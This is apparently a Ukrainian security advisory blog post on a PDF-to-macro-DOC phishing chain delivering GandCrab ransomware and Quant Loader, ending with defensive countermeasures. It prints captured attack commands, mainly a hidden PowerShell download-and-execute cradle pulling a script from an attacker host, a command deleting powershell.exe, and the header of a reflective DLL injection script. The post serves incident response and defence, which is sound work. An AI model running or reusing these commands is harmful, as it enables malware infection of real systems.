IOC_pdf>doc_0218

Усім привіт!.

Хочемо звернути вашу увагу на схему, яка застосовується останніми днями для розповсюдження Dridex, Grancrab Ransomware та QuantLoader.

Станом на ранок 9го лютого звернень по цим зразкам від українських організацій не надходило.

Проте варто підготуватися до застосування такої тактики проти наших систем.

Зразки коду були взяті з http://www.malware-traffic-analysis.net/

Як це виглядає:

  1. Жертва отримує фейкового листа із посиланням на “важливий” документ.
  2. Після завантаження та відкриття PDF жертва бачить пусту сторінку і зображення капчі.
  3. Клік по капчі містить посилання на DOC файл.
  4. При відкритті DOC файлу жертву просять активувати макроси.
  5. Активація макросу призводить до інфікування.

Ознайомте персонал із знімками екрану PDF та DOC файлу.

Попередьте, що зображення можуть замінити.

Забороніть передачу керування від MS Office на CMD та Powershell.

Результат перевірки документів

Схема атаки:

email > URL > PDF > DOC > Maco > Powershell / CMD > GET > .exe

Маркери за 7/02/18 – розповсюдження GrandСrab Ransomware

Активність по процесам:



"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\grandcrab\attachments\Feb-3178376.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\butcaketforthen[.]com/docs/Feb-00974.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
cmd.exe /c START "" %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\nslookup.exe
nslookup nomoreransom[.]coin dns1.soprodns[.]ru
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /f /q
timeout  -c 5

 

Мережева активність:

119.28.111.49      HTTP  370    butcaketforthen[.]com    GET /docs/Feb-00974.doc HTTP/1.1
119.28.111.49      HTTP  127    sorinnohoun[.]com GET /sc1/sct5 HTTP/1.1
151.248.118.75    HTTP  4387  nomoreransom[.]coin      POST /curl.php?token=1018 HTTP/1.1  (application/x-www-form-urlencoded)

Зверніть увагу на “фішку” GrandСrab – використання інакших DNS серверів для резолву серверів контролю 

10.10.10.10 DNS   89               Standard query 0x4908 A ipv4bot.whatismyipaddress[.]com
10.10.10.10 DNS   76               Standard query 0xac2e A dns1.soprodns[.]ru
193.0.179.152      DNS   77               Standard query 0x0002 A nomoreransom[.]coin

Частина скрипта інжекту Powershell

GET /sc1/sct5 HTTP/1.1
Host: sorinnohoun[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 09 Feb 2018 08:04:51 GMT
Content-Type: application/octet-stream

function Invoke-Inj
{
<#
.SYNOPSIS

This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

# # # # #

Маркери за 8/02/18 – розповсюдження Quant Loader

Активність по процесам:

"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\0820\08.02.2018_7719830.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\hinenreb[.]com/docs/08.02.2018.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd.exe /c START "" C:\tmp\rozabich8.exe
C:\tmp\rozabich8.exe

Мережева активність:

119.28.111.49      HTTP  364    hinenreb[.]com     GET /docs/08.02.2018.doc HTTP/1.1
119.28.111.49      HTTP  278    pertalted[.]com     GET /p66/yutg5 HTTP/1.1

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Ознайомити персонал із послідовністю атак, показати знімки екранів PDF та DOC файлів – щоб не клацали!
  • Блок макросів, блок посилань у PDF файлах
  • Відстеження спроб виклику nslookup (притаманно інфікуванню GrandCrab)
  • Заборона створення дочірніх процесів (передача керування) MW Office > CMD > Powershell
  • Блокування доступу до мережі Інтернет для процесів Powershell (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , , , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: